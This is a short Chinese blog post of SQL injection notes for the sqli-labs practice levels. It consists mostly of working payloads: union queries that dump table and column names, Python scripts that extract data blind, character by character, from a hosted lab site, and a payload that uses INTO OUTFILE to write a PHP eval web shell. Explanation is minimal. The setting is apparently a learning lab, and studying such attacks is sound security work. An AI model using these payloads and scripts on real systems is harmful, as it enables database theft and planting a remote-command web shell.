sql注入

关于sql注入

  • sql注入的前要

    • 没有对用户的输入进行过滤,和对sql语句的预编译

select group_concat(table_name) from information_schema.tables where table_schema=database()
?id=-1") union  select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() %23

?id=-1") UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),0,1) )=','%23
import requests
import time
for i in range(0,100):
   if(i%10==0):
       time.sleep(1)
   url = "https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
   res = requests.get(url)
   if (len(res.content) == 704):
       print(",",end="")
       continue
   for e in range(ord("a"), ord("z") + 1):
       url="https://sql.alienwares.top/Less-5/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
       res=requests.get(url)

       if (len(res.content) == 704):
           print(chr(e), end="")
           break
?id=1" and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1) )='e' %23
py 脚本同上


@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
http://localhost/sqli-labs-master/Less-7/?id=-1')) union select 1,'2','<?php @eval($_POST["cmd"]);?>' into outfile 'C:/AppServ/www/data.txt' %23
import requests
import time
#706 正确的长度
for i in range(0,100):
   url = "https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(i) + ",1) )=','%23"
   res = requests.get(url)
   time.sleep(1)
   if (len(res.content) == 706):
       print(",",end="")
       continue
   for e in range(ord("a"), ord("z") + 1):
       url="https://sql.alienwares.top/Less-8/?id=1' and (select mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1) )='"+chr(e)+"'%23"
       res=requests.get(url)
       time.sleep(1)
       if (len(res.content) == 706):
           print(chr(e), end="")
           break



posted @ 2021-01-04 20:50  PointerK  阅读(74)  评论(0编辑  收藏  举报